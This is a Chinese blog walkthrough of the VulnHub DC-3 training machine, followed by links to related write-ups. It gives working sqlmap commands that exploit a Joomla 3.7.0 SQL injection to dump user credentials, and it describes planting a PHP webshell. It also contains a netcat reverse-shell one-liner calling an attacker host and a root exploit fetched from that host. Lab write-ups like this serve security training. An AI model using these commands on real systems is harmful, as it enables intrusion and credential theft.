vulnhub靶场,DC-3

最新推荐文章于 2024-06-04 22:11:38 发布
最新推荐文章于 2024-06-04 22:11:38 发布
阅读量436 收藏
点赞数
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/118654993
版权

vulnhub靶场,DC-3

环境准备

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
攻击机:kali(192.168.58.130)
靶机:DC-3(192.168.58.146)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.58.146
使用nmap扫描查看目标靶机端口开放情况

可以看到目标靶机只开放了80端口
浏览器访问目标靶机80端口,使用浏览器插件Wappalyzer查看网站基本信息

可以看到网站CMS为joomla,可以使用JoomScan(一款开源的OWASP的 Joomla ( CMS ) 漏洞扫描器)进行漏洞扫描

joomscan --url http://192.168.58.146/ #进行漏洞扫描


成功获得网站CMS具体版本信息和后台登入地址

查看kali的漏洞库,看看Joomla 3.7.0是否存在漏洞

发现确实存在一个SQL注入漏洞,查看这个漏洞描述

存在SQL注入的url为:http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

渗透过程

前面信息收集已经确定了存在SQL注入的url,使用sqlmap进行自动化注入,查看当前库

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


查看joomladb库下的所有表

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]


查看#__users表下的所有字段

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]


查看username、password字段的值

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "username,password" --dump -p list[fullordering]


密码是加密了的,将密码存到一个文件里,使用john去解密

成功获得密码,试试能不能登入网站后台

成功进入后台,看看是否有能上传文件的位置

发现这个位置是可以随便更改源码的,也可以上传文件
新建文件icepeak.php,内容为一句话木马

保存后使用蚁剑连接,连接成功

使用nc进行反弹shell
kali终端中:

蚁剑终端中:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.58.130 1234 >/tmp/f


可以看到kali这边成功反弹到一个shell

权限提升

cat /etc/issue #查看版本当前操作系统发行版信息


查找Ubuntu 16.04存在的漏洞

这里可以利用39772提权,将exp下载到本地
开启kali的apache服务,将39772.zip放在网站根目录下面

靶机下载39772.zip,进行解压

进入39772目录,将exploit.tar进行解压

运行以下两个文件即可

成功提升权限为root,在root根目录下找到flag,靶机渗透完成

super 硕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub系列之DC3靶场详解
weixin_50053818的博客
05-08 1131
文章目录**环境****flag** 环境 DC-3靶场 VMware虚拟机 kali flag 只能从VM虚拟机得到目标靶场的MAC地址,从而得到目标靶场的IP地址,即192.168.43.50.直接上nmap进行扫描。 由nmap结果可以知道,目标靶场只开放了80端口。所以直接访问网页。 根据提示只有一个flag,并且需要拿到root权限才能得到。并且可以知道网站的CMS系统是Joomla。kali自带Joomla的扫描命令即Joomscan. joomscan -u 192.168.43..
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub DC-3
柠檬木有枝
07-14 1141
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
vulnhub靶机实战DC-3
最新发布
Varin
06-04 952
vulnhub靶机实战DC-3
VulnHub DC3
baynk的博客
05-16 288
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
vulnhubdc3
qq_54030686的博客
06-08 272
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
vulnhub靶机之dc-3
m0_52328368的博客
08-14 1311
dc-3靶机教程
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHubDC-3
qq_45434762的博客
03-23 483
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhub-DC3
weixin_55129870的博客
05-15 494
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 402
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
[Vulnhub] DC-3
weixin_63231007的博客
01-28 470
DC系列靶机-第三弹(JoomlaCMS漏洞+sqlmap+系统漏洞提权)
Vulnhub系列_DC-3
weixin_41064688的博客
01-10 864
Vulnhub系列_DC-3 DC系列下载地址:https://download.vulnhub.com/dc/或http://www.five86.com/downloads.html 工具和漏洞: Netdiscover:进行网络发现 Nmap:端口扫描 Whatweb: 识别靶机网址使用的web服务、系统版本、CMS系统等 Joomscan: 扫描Joomla相关配置内容、检测已知漏洞等 S...
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1846
vulnhub DC系列 DC-3
vulnhub靶场DC-3
qq_58091216的博客
01-08 1284
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值